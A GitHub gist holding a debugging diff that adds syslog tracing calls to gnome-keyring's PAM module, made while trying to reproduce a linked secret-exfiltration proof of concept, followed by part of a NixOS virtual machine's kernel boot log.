Skip to content

Instantly share code, notes, and snippets.

@jtojnar
Last active August 2, 2024 14:25
Show Gist options
  • Save jtojnar/a436379b5eae154eded9843493608069 to your computer and use it in GitHub Desktop.
Save jtojnar/a436379b5eae154eded9843493608069 to your computer and use it in GitHub Desktop.
Trying to reproduce secret exfiltration with POC in https://gist.github.com/jtojnar/d1c98d5d803cee3998f68e2e1761c8f8
diff --git a/pam/gkr-pam-client.c b/pam/gkr-pam-client.c
index ebb7f798..b575dbbf 100644
--- a/pam/gkr-pam-client.c
+++ b/pam/gkr-pam-client.c
@@ -59,7 +59,7 @@
static int
check_peer_same_uid (struct passwd *pwd,
int sock)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
uid_t uid = -1;
/*
@@ -126,7 +126,7 @@ check_peer_same_uid (struct passwd *pwd,
static int
write_credentials_byte (int sock)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
for (;;) {
if (egg_unix_credentials_write (sock) < 0) {
if (errno == EINTR || errno == EAGAIN)
@@ -146,7 +146,7 @@ static int
lookup_daemon (struct passwd *pwd,
const char *control,
struct sockaddr_un *addr)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
struct stat st;
if (strlen (control) + 1 > sizeof (addr->sun_path)) {
@@ -161,8 +161,10 @@ lookup_daemon (struct passwd *pwd,
/* A bunch of checks to make sure nothing funny is going on */
if (lstat (addr->sun_path, &st) < 0) {
- if (errno == ENOENT)
+ if (errno == ENOENT) {
+ syslog (GKR_LOG_INFO, "%s: GKD_CONTROL_RESULT_NO_DAEMON %s -- %s", __func__, control, addr->sun_path);
return GKD_CONTROL_RESULT_NO_DAEMON;
+ }
syslog (GKR_LOG_ERR, "Couldn't access gnome keyring socket: %s: %s",
addr->sun_path, strerror (errno));
@@ -188,7 +190,7 @@ static int
connect_daemon (struct passwd *pwd,
struct sockaddr_un *addr,
int *out_sock)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
int sock;
/* Now we connect */
@@ -204,6 +206,7 @@ connect_daemon (struct passwd *pwd,
if (connect (sock, (struct sockaddr *)addr, sizeof (*addr)) < 0) {
if (errno == ECONNREFUSED) {
close (sock);
+ syslog (GKR_LOG_INFO, "%s: GKD_CONTROL_RESULT_NO_DAEMON", __func__);
return GKD_CONTROL_RESULT_NO_DAEMON;
}
syslog (GKR_LOG_ERR, "couldn't connect to gnome-keyring-daemon socket at: %s: %s",
@@ -232,7 +235,7 @@ connect_daemon (struct passwd *pwd,
static void
write_part (int fd, const unsigned char *data, int len, int *res)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
assert (res);
/* Already an error present */
@@ -261,7 +264,7 @@ read_part (int fd,
unsigned char *data,
int len,
int disconnect_ok)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
int r, all;
all = len;
@@ -297,7 +300,7 @@ keyring_daemon_op (struct passwd *pwd,
int op,
int argc,
const char *argv[])
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
int ret = GKD_CONTROL_RESULT_OK;
unsigned char buf[4];
int want_disconnect;
@@ -388,7 +391,7 @@ done:
int
gkr_pam_client_run_operation (struct passwd *pwd, const char *control,
int op, int argc, const char* argv[])
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
struct sigaction ignpipe, oldpipe, defchld, oldchld;
struct sockaddr_un addr;
int res;
diff --git a/pam/gkr-pam-module.c b/pam/gkr-pam-module.c
index 7a6b735e..9920a136 100644
--- a/pam/gkr-pam-module.c
+++ b/pam/gkr-pam-module.c
@@ -349,7 +349,7 @@ setup_child (int inp[2],
pam_handle_t *ph,
struct passwd *pwd,
const char *argument)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const char* display;
const char *runtime;
int i, ret;
@@ -431,7 +431,7 @@ setup_child (int inp[2],
static int
log_problem (char *line, void *arg)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
int *failed;
/*
@@ -449,7 +449,7 @@ log_problem (char *line, void *arg)
static int
setup_environment (char *line, void *arg)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
pam_handle_t *ph = (pam_handle_t*)arg;
int ret;
@@ -476,7 +476,7 @@ start_daemon (pam_handle_t *ph,
struct passwd *pwd,
bool is_user_login,
const char *password)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
struct sigaction defsact, oldsact, ignpipe, oldpipe;
int inp[2] = { -1, -1 };
int outp[2] = { -1, -1 };
@@ -609,15 +609,17 @@ done:
/* control must be at least MAX_CONTROL_SIZE */
static int
get_control_file (pam_handle_t *ph, char *control)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const char *control_root;
const char *suffix;
control_root = get_any_env (ph, ENV_CONTROL);
if (control_root == NULL) {
control_root = get_any_env (ph, "XDG_RUNTIME_DIR");
- if (control_root == NULL)
+ if (control_root == NULL) {
+ syslog (GKR_LOG_INFO, "%s: GKD_CONTROL_RESULT_NO_DAEMON", __func__);
return GKD_CONTROL_RESULT_NO_DAEMON;
+ }
suffix = "/keyring/control";
} else {
suffix = "/control";
@@ -638,7 +640,7 @@ get_control_file (pam_handle_t *ph, char *control)
static int
stop_daemon (pam_handle_t *ph,
struct passwd *pwd)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
char control[MAX_CONTROL_SIZE];
int res;
@@ -670,7 +672,7 @@ unlock_keyring (pam_handle_t *ph,
struct passwd *pwd,
const char *password,
int *need_daemon)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
char control[MAX_CONTROL_SIZE];
int res;
const char *argv[2];
@@ -712,7 +714,7 @@ change_keyring_password (pam_handle_t *ph,
const char *password,
const char *original,
int *need_daemon)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
char control[MAX_CONTROL_SIZE];
const char *argv[3];
int res;
@@ -755,7 +757,7 @@ change_keyring_password (pam_handle_t *ph,
static int
prompt_password (pam_handle_t *ph)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const struct pam_conv *conv;
struct pam_message msg;
struct pam_response *resp;
@@ -800,7 +802,7 @@ prompt_password (pam_handle_t *ph)
static uint
parse_args (pam_handle_t *ph, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
uint args = 0;
const void *svc;
int only_if_len;
@@ -837,7 +839,7 @@ parse_args (pam_handle_t *ph, int argc, const char **argv)
static int
stash_password_for_session (pam_handle_t *ph,
const char *password)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
if (pam_set_data (ph, "gkr_system_authtok", strdup (password),
cleanup_free_password) != PAM_SUCCESS) {
syslog (GKR_LOG_ERR, "gkr-pam: error stashing password for session");
@@ -849,7 +851,7 @@ stash_password_for_session (pam_handle_t *ph,
PAM_EXTERN int
pam_sm_authenticate (pam_handle_t *ph, int unused, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
struct passwd *pwd;
const char *user, *password;
int need_daemon = 0;
@@ -902,7 +904,7 @@ pam_sm_authenticate (pam_handle_t *ph, int unused, int argc, const char **argv)
PAM_EXTERN int
pam_sm_open_session (pam_handle_t *ph, int flags, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const char *user = NULL, *password = NULL;
struct passwd *pwd;
int ret;
@@ -957,13 +959,13 @@ pam_sm_open_session (pam_handle_t *ph, int flags, int argc, const char **argv)
PAM_EXTERN int
pam_sm_setcred (pam_handle_t * ph, int flags, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
return PAM_SUCCESS;
}
static int
pam_chauthtok_preliminary (pam_handle_t *ph, struct passwd *pwd)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
/*
* If a super-user is changing a user's password then pam_unix.so
* doesn't prompt for the user's current password, which means we
@@ -987,7 +989,7 @@ pam_chauthtok_preliminary (pam_handle_t *ph, struct passwd *pwd)
static int
pam_chauthtok_update (pam_handle_t *ph, struct passwd *pwd, uint args)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const char *password, *original;
int need_daemon = 0;
int ret;
@@ -1060,14 +1062,14 @@ pam_chauthtok_update (pam_handle_t *ph, struct passwd *pwd, uint args)
PAM_EXTERN int
pam_sm_close_session (pam_handle_t *ph, int flags, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
/* Nothing to do, but we have to have this function exported */
return PAM_SUCCESS;
}
PAM_EXTERN int
pam_sm_chauthtok (pam_handle_t *ph, int flags, int argc, const char **argv)
-{
+{syslog (GKR_LOG_INFO, "called %s", __func__);
const char *user;
struct passwd *pwd;
uint args;
machine # Aug 02 11:49:32 machine kernel: Linux version 6.6.43 (nixbld@localhost) (gcc (GCC) 13.3.0, GNU ld (GNU Binutils) 2.42) #1-NixOS SMP PREEMPT_DYNAMIC Sat Jul 27 09:34:11 UTC 2024
machine # Aug 02 11:49:32 machine kernel: Command line: initrd=\EFI\nixos\71fy5sjiw960h9lsr2468i51whk6kzm0-initrd-linux-6.6.43-initrd.efi init=/nix/store/iwhmxln8mmfmjq5cirkqhf7c3awql97d-nixos-system-machine-test/init console=tty1
machine # Aug 02 11:49:32 machine kernel: BIOS-provided physical RAM map:
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009ffff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000100000-0x00000000007fffff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000800000-0x0000000000807fff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000808000-0x000000000080afff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x000000000080b000-0x000000000080bfff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x000000000080c000-0x000000000080ffff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000810000-0x00000000008fffff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000000900000-0x00000000bf8ecfff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bf8ed000-0x00000000bfb6cfff] reserved
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bfb6d000-0x00000000bfb7efff] ACPI data
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bfb7f000-0x00000000bfbfefff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bfbff000-0x00000000bfef3fff] usable
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bfef4000-0x00000000bff77fff] reserved
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000bff78000-0x00000000bfffffff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000feffc000-0x00000000feffffff] reserved
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x00000000ffc00000-0x00000000ffffffff] reserved
machine # Aug 02 11:49:32 machine kernel: BIOS-e820: [mem 0x0000000100000000-0x000000013fffffff] usable
machine # Aug 02 11:49:32 machine kernel: NX (Execute Disable) protection: active
machine # Aug 02 11:49:32 machine kernel: APIC: Static calls initialized
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda68018-0xbda71a57] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda68018-0xbda71a57] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda40018-0xbda67457] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda40018-0xbda67457] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda18018-0xbda3f457] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbda18018-0xbda3f457] usable ==> usable
machine # Aug 02 11:49:32 machine kernel: extended physical RAM map:
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000000000-0x000000000009ffff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000100000-0x00000000007fffff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000800000-0x0000000000807fff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000808000-0x000000000080afff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x000000000080b000-0x000000000080bfff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x000000000080c000-0x000000000080ffff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000810000-0x00000000008fffff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000000900000-0x00000000bda18017] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda18018-0x00000000bda3f457] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda3f458-0x00000000bda40017] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda40018-0x00000000bda67457] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda67458-0x00000000bda68017] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda68018-0x00000000bda71a57] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bda71a58-0x00000000bf8ecfff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bf8ed000-0x00000000bfb6cfff] reserved
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bfb6d000-0x00000000bfb7efff] ACPI data
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bfb7f000-0x00000000bfbfefff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bfbff000-0x00000000bfef3fff] usable
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bfef4000-0x00000000bff77fff] reserved
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000bff78000-0x00000000bfffffff] ACPI NVS
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000feffc000-0x00000000feffffff] reserved
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x00000000ffc00000-0x00000000ffffffff] reserved
machine # Aug 02 11:49:32 machine kernel: reserve setup_data: [mem 0x0000000100000000-0x000000013fffffff] usable
machine # Aug 02 11:49:32 machine kernel: efi: EFI v2.7 by EDK II
machine # Aug 02 11:49:32 machine kernel: efi: SMBIOS=0xbf93f000 ACPI=0xbfb7e000 ACPI 2.0=0xbfb7e014 MEMATTR=0xbebe1018 RNG=0xbfb75f18 INITRD=0xbda72f98
machine # Aug 02 11:49:32 machine kernel: random: crng init done
machine # Aug 02 11:49:32 machine kernel: efi: Remove mem121: MMIO range=[0xffc00000-0xffffffff] (4MB) from e820 map
machine # Aug 02 11:49:32 machine kernel: e820: remove [mem 0xffc00000-0xffffffff] reserved
machine # Aug 02 11:49:32 machine kernel: SMBIOS 2.8 present.
machine # Aug 02 11:49:32 machine kernel: DMI: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 2/2/2022
machine # Aug 02 11:49:32 machine kernel: Hypervisor detected: KVM
machine # Aug 02 11:49:32 machine kernel: kvm-clock: Using msrs 4b564d01 and 4b564d00
machine # Aug 02 11:49:32 machine kernel: kvm-clock: using sched offset of 6089597353 cycles
machine # Aug 02 11:49:32 machine kernel: clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns
machine # Aug 02 11:49:32 machine kernel: tsc: Detected 2611.200 MHz processor
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
machine # Aug 02 11:49:32 machine kernel: e820: remove [mem 0x000a0000-0x000fffff] usable
machine # Aug 02 11:49:32 machine kernel: last_pfn = 0x140000 max_arch_pfn = 0x400000000
machine # Aug 02 11:49:32 machine kernel: MTRR map: 4 entries (2 fixed + 2 variable; max 18), built from 8 variable MTRRs
machine # Aug 02 11:49:32 machine kernel: x86/PAT: Configuration [0-7]: WB WC UC- UC WB WP UC- WT
machine # Aug 02 11:49:32 machine kernel: last_pfn = 0xbfef4 max_arch_pfn = 0x400000000
machine # Aug 02 11:49:32 machine kernel: Using GB pages for direct mapping
machine # Aug 02 11:49:32 machine kernel: Secure boot disabled
machine # Aug 02 11:49:32 machine kernel: RAMDISK: [mem 0xbb3cf000-0xbbf75fff]
machine # Aug 02 11:49:32 machine kernel: ACPI: Early table checksum verification disabled
machine # Aug 02 11:49:32 machine kernel: ACPI: RSDP 0x00000000BFB7E014 000024 (v02 BOCHS )
machine # Aug 02 11:49:32 machine kernel: ACPI: XSDT 0x00000000BFB7D0E8 00004C (v01 BOCHS BXPC 00000001 01000013)
machine # Aug 02 11:49:32 machine kernel: ACPI: FACP 0x00000000BFB7A000 000074 (v01 BOCHS BXPC 00000001 BXPC 00000001)
machine # Aug 02 11:49:32 machine kernel: ACPI: DSDT 0x00000000BFB7B000 001B64 (v01 BOCHS BXPC 00000001 BXPC 00000001)
machine # Aug 02 11:49:32 machine kernel: ACPI: FACS 0x00000000BFBDD000 000040
machine # Aug 02 11:49:32 machine kernel: ACPI: APIC 0x00000000BFB79000 000078 (v03 BOCHS BXPC 00000001 BXPC 00000001)
machine # Aug 02 11:49:32 machine kernel: ACPI: HPET 0x00000000BFB78000 000038 (v01 BOCHS BXPC 00000001 BXPC 00000001)
machine # Aug 02 11:49:32 machine kernel: ACPI: WAET 0x00000000BFB77000 000028 (v01 BOCHS BXPC 00000001 BXPC 00000001)
machine # Aug 02 11:49:32 machine kernel: ACPI: BGRT 0x00000000BFB76000 000038 (v01 INTEL EDK2 00000002 01000013)
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving FACP table memory at [mem 0xbfb7a000-0xbfb7a073]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving DSDT table memory at [mem 0xbfb7b000-0xbfb7cb63]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving FACS table memory at [mem 0xbfbdd000-0xbfbdd03f]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving APIC table memory at [mem 0xbfb79000-0xbfb79077]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving HPET table memory at [mem 0xbfb78000-0xbfb78037]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving WAET table memory at [mem 0xbfb77000-0xbfb77027]
machine # Aug 02 11:49:32 machine kernel: ACPI: Reserving BGRT table memory at [mem 0xbfb76000-0xbfb76037]
machine # Aug 02 11:49:32 machine kernel: No NUMA configuration found
machine # Aug 02 11:49:32 machine kernel: Faking a node at [mem 0x0000000000000000-0x000000013fffffff]
machine # Aug 02 11:49:32 machine kernel: NODE_DATA(0) allocated [mem 0x13fff8000-0x13fffdfff]
machine # Aug 02 11:49:32 machine kernel: Zone ranges:
machine # Aug 02 11:49:32 machine kernel: DMA [mem 0x0000000000001000-0x0000000000ffffff]
machine # Aug 02 11:49:32 machine kernel: DMA32 [mem 0x0000000001000000-0x00000000ffffffff]
machine # Aug 02 11:49:32 machine kernel: Normal [mem 0x0000000100000000-0x000000013fffffff]
machine # Aug 02 11:49:32 machine kernel: Device empty
machine # Aug 02 11:49:32 machine kernel: Movable zone start for each node
machine # Aug 02 11:49:32 machine kernel: Early memory node ranges
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x0000000000001000-0x000000000009ffff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x0000000000100000-0x00000000007fffff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x0000000000808000-0x000000000080afff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x000000000080c000-0x000000000080ffff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x0000000000900000-0x00000000bf8ecfff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x00000000bfbff000-0x00000000bfef3fff]
machine # Aug 02 11:49:32 machine kernel: node 0: [mem 0x0000000100000000-0x000000013fffffff]
machine # Aug 02 11:49:32 machine kernel: Initmem setup node 0 [mem 0x0000000000001000-0x000000013fffffff]
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA: 1 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA: 96 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA: 8 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA: 1 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA: 240 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone DMA32: 786 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: On node 0, zone Normal: 268 pages in unavailable ranges
machine # Aug 02 11:49:32 machine kernel: ACPI: PM-Timer IO Port: 0xb008
machine # Aug 02 11:49:32 machine kernel: ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])
machine # Aug 02 11:49:32 machine kernel: IOAPIC[0]: apic_id 0, version 17, address 0xfec00000, GSI 0-23
machine # Aug 02 11:49:32 machine kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
machine # Aug 02 11:49:32 machine kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)
machine # Aug 02 11:49:32 machine kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
machine # Aug 02 11:49:32 machine kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)
machine # Aug 02 11:49:32 machine kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)
machine # Aug 02 11:49:32 machine kernel: ACPI: Using ACPI (MADT) for SMP configuration information
machine # Aug 02 11:49:32 machine kernel: ACPI: HPET id: 0x8086a201 base: 0xfed00000
machine # Aug 02 11:49:32 machine kernel: e820: update [mem 0xbe63c000-0xbe644fff] usable ==> reserved
machine # Aug 02 11:49:32 machine kernel: TSC deadline timer available
machine # Aug 02 11:49:32 machine kernel: smpboot: Allowing 1 CPUs, 0 hotplug CPUs
machine # Aug 02 11:49:32 machine kernel: kvm-guest: APIC: eoi() replaced with kvm_guest_apic_eoi_write()
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0x00000000-0x00000fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0x000a0000-0x000fffff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0x00800000-0x00807fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0x0080b000-0x0080bfff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0x00810000-0x008fffff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda18000-0xbda18fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda3f000-0xbda3ffff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda40000-0xbda40fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda67000-0xbda67fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda68000-0xbda68fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbda71000-0xbda71fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbe63c000-0xbe644fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbf8ed000-0xbfb6cfff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbfb6d000-0xbfb7efff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbfb7f000-0xbfbfefff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbfef4000-0xbff77fff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xbff78000-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xc0000000-0xfeffbfff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xfeffc000-0xfeffffff]
machine # Aug 02 11:49:32 machine kernel: PM: hibernation: Registered nosave memory: [mem 0xff000000-0xffffffff]
machine # Aug 02 11:49:32 machine kernel: [mem 0xc0000000-0xfeffbfff] available for PCI devices
machine # Aug 02 11:49:32 machine kernel: Booting paravirtualized kernel on KVM
machine # Aug 02 11:49:32 machine kernel: clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1910969940391419 ns
machine # Aug 02 11:49:32 machine kernel: setup_percpu: NR_CPUS:384 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1
machine # Aug 02 11:49:32 machine kernel: percpu: Embedded 84 pages/cpu s221184 r8192 d114688 u2097152
machine # Aug 02 11:49:32 machine kernel: pcpu-alloc: s221184 r8192 d114688 u2097152 alloc=1*2097152
machine # Aug 02 11:49:32 machine kernel: pcpu-alloc: [0] 0
machine # Aug 02 11:49:32 machine kernel: kvm-guest: PV spinlocks disabled, single CPU
machine # Aug 02 11:49:32 machine kernel: Kernel command line: initrd=\EFI\nixos\71fy5sjiw960h9lsr2468i51whk6kzm0-initrd-linux-6.6.43-initrd.efi init=/nix/store/iwhmxln8mmfmjq5cirkqhf7c3awql97d-nixos-system-machine-test/init console=tty1
machine # Aug 02 11:49:32 machine kernel: Dentry cache hash table entries: 524288 (order: 10, 4194304 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: Inode-cache hash table entries: 262144 (order: 9, 2097152 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: Fallback order for Node 0: 0
machine # Aug 02 11:49:32 machine kernel: Built 1 zonelists, mobility grouping on. Total pages: 1028862
machine # Aug 02 11:49:32 machine kernel: Policy zone: Normal
machine # Aug 02 11:49:32 machine kernel: mem auto-init: stack:all(zero), heap alloc:on, heap free:off
machine # Aug 02 11:49:32 machine kernel: software IO TLB: area num 1.
machine # Aug 02 11:49:32 machine kernel: Memory: 3955188K/4188704K available (16384K kernel code, 2366K rwdata, 10840K rodata, 3116K init, 4492K bss, 233260K reserved, 0K cma-reserved)
machine # Aug 02 11:49:32 machine kernel: SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
machine # Aug 02 11:49:32 machine kernel: ftrace: allocating 42829 entries in 168 pages
machine # Aug 02 11:49:32 machine kernel: ftrace: allocated 168 pages with 3 groups
machine # Aug 02 11:49:32 machine kernel: Dynamic Preempt: voluntary
machine # Aug 02 11:49:32 machine kernel: rcu: Preemptible hierarchical RCU implementation.
machine # Aug 02 11:49:32 machine kernel: rcu: RCU event tracing is enabled.
machine # Aug 02 11:49:32 machine kernel: rcu: RCU restricting CPUs from NR_CPUS=384 to nr_cpu_ids=1.
machine # Aug 02 11:49:32 machine kernel: Trampoline variant of Tasks RCU enabled.
machine # Aug 02 11:49:32 machine kernel: Rude variant of Tasks RCU enabled.
machine # Aug 02 11:49:32 machine kernel: Tracing variant of Tasks RCU enabled.
machine # Aug 02 11:49:32 machine kernel: rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
machine # Aug 02 11:49:32 machine kernel: rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
machine # Aug 02 11:49:32 machine kernel: NR_IRQS: 24832, nr_irqs: 256, preallocated irqs: 16
machine # Aug 02 11:49:32 machine kernel: rcu: srcu_init: Setting srcu_struct sizes based on contention.
machine # Aug 02 11:49:32 machine kernel: kfence: initialized - using 2097152 bytes for 255 objects at 0x(____ptrval____)-0x(____ptrval____)
machine # Aug 02 11:49:32 machine kernel: Console: colour dummy device 80x25
machine # Aug 02 11:49:32 machine kernel: printk: console [tty1] enabled
machine # Aug 02 11:49:32 machine kernel: ACPI: Core revision 20230628
machine # Aug 02 11:49:32 machine kernel: clocksource: hpet: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604467 ns
machine # Aug 02 11:49:32 machine kernel: APIC: Switch to symmetric I/O mode setup
machine # Aug 02 11:49:32 machine kernel: x2apic enabled
machine # Aug 02 11:49:32 machine kernel: APIC: Switched APIC routing to: physical x2apic
machine # Aug 02 11:49:32 machine kernel: ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
machine # Aug 02 11:49:32 machine kernel: clocksource: tsc-early: mask: 0xffffffffffffffff max_cycles: 0x25a39079a08, max_idle_ns: 440795310461 ns
machine # Aug 02 11:49:32 machine kernel: Calibrating delay loop (skipped) preset value.. 5222.40 BogoMIPS (lpj=2611200)
machine # Aug 02 11:49:32 machine kernel: x86/cpu: User Mode Instruction Prevention (UMIP) activated
machine # Aug 02 11:49:32 machine kernel: Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0
machine # Aug 02 11:49:32 machine kernel: Last level dTLB entries: 4KB 0, 2MB 0, 4MB 0, 1GB 0
machine # Aug 02 11:49:32 machine kernel: Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization
